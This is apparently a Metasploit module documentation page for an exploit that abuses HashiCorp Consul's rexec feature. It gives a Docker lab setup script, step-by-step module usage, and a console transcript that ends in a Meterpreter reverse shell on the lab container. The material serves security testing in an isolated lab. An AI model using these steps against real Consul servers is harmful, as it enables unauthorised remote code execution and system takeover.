adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
e76f3ab22fc2f2aa9fbc1ba015cc5e4fa9cf4eff
metasploit-gs/documentation/modules/exploit/multi/misc/consul_rexec_exec.md
T
Quentin Kaiser e36b027b1f Typo fix + Garfield ref.
2018-08-10 22:47:18 +02:00

4.7 KiB
Raw Blame History

Vulnerable Application

Description

This module exploits a feature of Hashicorp Consul named rexec.

The exec command provides a mechanism for remote execution. For example, this can be used to run the uptime command across all machines providing the web service.

The exposure of rexec service depends on the disable_remote_exec option. This option was set to true starting from Consul 0.8, to make remote exec opt-in instead of opt-out.

References

Test setup

The following bash script can be used to setup a testing environment with Docker:

#!/bin/sh

echo "[+] Launching consul instances..."
docker run -d --name=consul_bootstrap_server consul agent -server -client=172.17.0.1 -bootstrap -data-dir /tmp/consul
sleep 2

docker run -d --name=consul_server_1 consul agent -server -client=172.17.0.2 -data-dir /tmp/consul
sleep 2
docker exec -t consul_bootstrap_server consul join -http-addr="172.17.0.1:8500" 172.17.0.2

docker run -d --name=consul_server_2 consul agent -server -client=172.17.0.3 -data-dir /tmp/consul
sleep 2
docker exec -t consul_bootstrap_server consul join -http-addr="172.17.0.1:8500" 172.17.0.3

docker run -d -e 'CONSUL_LOCAL_CONFIG={"leave_on_terminate": true, "disable_remote_exec":false}' consul agent -ui -client=172.17.0.4 -retry-join=172.17.0.1

sleep 4
echo "[+] Checking members..."
docker exec -t consul_bootstrap_server consul members -http-addr="172.17.0.1:8500"

You should observe something similar to the excerpt below when running the script:

sudo ./launch.sh
[+] Launching consul instances...
23e8aa4687846382e601ec3c5a66d6db9448518647996f8fd8fdbcdde7f612cf
b28c7929c2a2141c162a35d635af48fdafd70f6c03bee61445e7e78f4e76af84
Successfully joined cluster by contacting 1 nodes.
7c53a6f486426ad6ab4886f3f7b85481932333850d0046280ca082ff1bb79358
Successfully joined cluster by contacting 1 nodes.
a58ec109f45029352a94721ee2e7c9c80a9c94178af8efd15279951da8ed0cab
[+] Checking members...
Node          Address          Status  Type    Build  Protocol  DC   Segment
23e8aa468784  172.17.0.1:8301  alive   server  1.0.6  2         dc1  <all>
7c53a6f48642  172.17.0.3:8301  alive   server  1.0.6  2         dc1  <all>
b28c7929c2a2  172.17.0.2:8301  alive   server  1.0.6  2         dc1  <all>
a58ec109f450  172.17.0.4:8301  alive   client  1.0.6  2         dc1  <default>

The following bash script can be used to stop and destroy all your running docker containers (so be careful if you use docker containers for other things at the same time):

#!/bin/sh
for h in `sudo docker ps | grep -v CONTAINER | cut -d' ' -f1`; do sudo docker stop $h && sudo docker rm $h; done

Verification Steps

You can verify the module against the vulnerable application with those steps:

  1. Launch a Consul cluster with the provided bash script
  2. Start msfconsole
  3. Do: use exploit/multi/misc/consul_rexec_exec
  4. Do: set RHOST 172.17.0.4
  5. Do: set RPORT 8500
  6. Do: check. The target should appear vulnerable.
  7. Do: set payload with the payload of your choosing.
  8. Do: set LHOST 172.17.42.1 (docker0 gateway IP)
  9. Do: run
  10. You should get a shell.

Scenarios

Reverse shell on Linux host

Exploit running against a Docker consul container target:

msf5 > use exploit/multi/misc/consul_rexec_exec
msf5 exploit(multi/misc/consul_rexec_exec) > set RHOSTS 172.17.0.4
RHOSTS => 172.17.0.4
msf5 exploit(multi/misc/consul_rexec_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/consul_rexec_exec) > set LHOST 172.17.42.1
LHOST => 172.17.42.1
msf5 exploit(multi/misc/consul_rexec_exec) > check
[+] 172.17.0.4:8500 The target is vulnerable.
msf5 exploit(multi/misc/consul_rexec_exec) > run

[*] Started reverse TCP handler on 172.17.42.1:4444
[*] Creating session.
[*] Got rexec session ID b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Setting command for rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Triggering execution on rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Sending stage (861480 bytes) to 172.17.0.4
[*] Cleaning up rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Command Stager progress - 115.73% done (883/763 bytes)

meterpreter > sysinfo
Computer     : 172.17.0.4
OS           :  (Linux 4.4.0-38-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.17.0.4 - Meterpreter session 1 closed.  Reason: User exit
Reference in New Issue View Git Blame Copy Permalink